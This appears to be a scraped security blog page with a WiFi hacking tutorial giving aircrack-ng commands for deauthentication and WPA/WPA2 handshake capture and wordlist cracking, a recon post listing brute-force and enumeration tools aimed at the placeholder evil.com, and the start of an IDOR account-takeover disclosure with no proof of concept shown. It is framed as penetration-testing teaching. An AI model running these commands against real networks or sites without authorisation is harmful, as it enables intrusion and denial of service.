WIFI Hacking!

Hello Hackers!

In this blog I am going to show you the basic things about WIFI hacking. Special thanks to Akshay for  well written content :)

################## KEY WORDS ###################

MAC - Media Access Control
BSSID - Basic Service Set Identifier
ESSID - Extended Service Set Identifier
SNR - Signal to Noise Ratio
PSK - Pre Shared Key
WPA - WiFi Protected Access
WEP - Wired Equivalent Privacy
WPS - Wi-fi Protected Setup

Test points:
# Is the AP running the latest firmware and security patches?
# Has the factory default ESSID been changed?
# Has the default administrative login/password been changed?
# Is the administrative password easily cracked?
# Are stronger authentication options available ?
# Are there any unnecessary ports open (e.g., Telnet, HTTP, SNMP,)?
# Are those open ports vulnerable to known exploits?
# Are encrypted administrative interfaces available (e.g., SSH, HTTPS)?
# Have security alerts or logs been enabled ?
# Are its security parameters consistent with defined policy?
# If the AP is using a PreShared Key (PSK), is it easily cracked?
# If the AP is not using WPA2, can it be upgraded to do so?
# Can the AP withstand simulated 802.11 DoS attacks (e.g., flood attack)?

De-authentication Attack
airodump-ng --channel <ch #> --bssid <mac id> wlan0mon

aireplay-ng --deauth <# of deauth packets> -a <AP mac> -c <client mac> wlan0mon

WPA/WPA2 Cracking:

(!) airmon-ng start wlan0
    # Get the wireless card in monitoring mode to capture the traffic.

(!) airodump-ng wlan0mon
    # Start to listen the network traffic and get BSSID & ESSID of targets

(!) airodump-ng --bssid <bssid of AP> -c <ch #> --write <filename> wlan0mon
    # Avoid extra noise from traffic by listening to a single target.
    # Get the BSSID of the clients connected to the target.
    # Write the dump to a file, which may also contain the 4 way handshake.

(!) aireplay-ng --deauth <# of frames> -a <AP bssid> wlan0mon
    # Deauthenticate clients of target and force them to establish the 4 way handshake.
    # 4 way handsake will be captured in our file as the dumping is running the background.

(!) aircrack-ng <filename> -w <wordlist>

    # Crack the key form the captured file by providing a wordlist

Some of my Achievements!

Recon is the Key Part-1

Hello Hackers!

My todays topic is all about enumeration. As reconnaissance is the most important step in hacking. So lets begin!

1. Whois lookup
This is the very basic step which we need to do for every domain which we want to test.

Things which we need to check are as follows:
1. Name servers
2. Check whether website is hosted on shared hosting or dedicated server.

2. DIG (Domain Information Groper) Command

The command dig is a tool for querying DNS nameservers for information about host addresses, mail exchanges, nameservers, and related information.

3. Dirsearch 
Dirsearch is a simple command line tool designed to brute force directories and files in websites.


python3 dirsearch.py -u 'http://evil.com/' -e php,asp,aspx,jsp,db,config,xls,ini,pdf,txt

4. Dirbuster
DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers.

5.  lazys3
A Ruby script to bruteforce for AWS s3 buckets using different permutations.
Command:  ruby lazys3.rb <COMPANY>
Example: ruby lazys3.rb evil

6.  Linkfinder

LinkFinder is a python script written to discover endpoints and their parameters in JavaScript files. This way penetration testers and bug hunters are able to gather new, hidden endpoints on the websites they are testing. Resulting in new testing ground, possibility containing new vulnerabilities.

python linkfinder.py -i http://www.evil.com/animate.js -o link.html


7.Check out the IP history

8. SSLScan

Scan the website for SSL bugs.

command: sslscan evil.com

9. Wapplyzer

Wappalyzer is a cross-platform utility that uncovers the technologies used on websites.

10. Builtwith

 Lets you find out what a website is built with by a simple click on the builtwith icon.


About Me.

I am a security enthusiast in the areas of web-applications, network engineering & mobile applications, programming is also a part of my interests (Python lover :p).Also work as an individual web-application security engineer with broad experience in all aspects of security management and implementation. I am looking forward towards hardening skills in various security standards. As a part of my core interest, always prefer consuming my leisure's in performing individual security audits and vulnerability assessments or source code analysis. I am also a bug bounty hunter. I participated in all major bug bounty programs organised by internet giants like Google, Microsoft,Apple, Bugcrowd,…..etc I have 3+ years of expertise in both black box as well as white box penetration testing.

Follow me :



Hack the Planet :)

Hello Hackers!

Today I am going to disclose my recent finding where I was able to takeover the user's account. So the target was planet.com as initially I was looking for some of the bugs in Google acquisitions :p

After Whois lookup and gathering some information from Crunchbase and Wiki, I came to know that it wasn't Google's acquisition but I still looked for vulnerabilities and found ACCOUNT TAKEOVER :)

Basically there was an IDOR vulnerability on their reset password link.

Check out the POC:


WIFI Hacking!

Hello Hackers! In this blog I am going to show you the basic things about WIFI hacking.   Special thanks to Akshay for   well writ...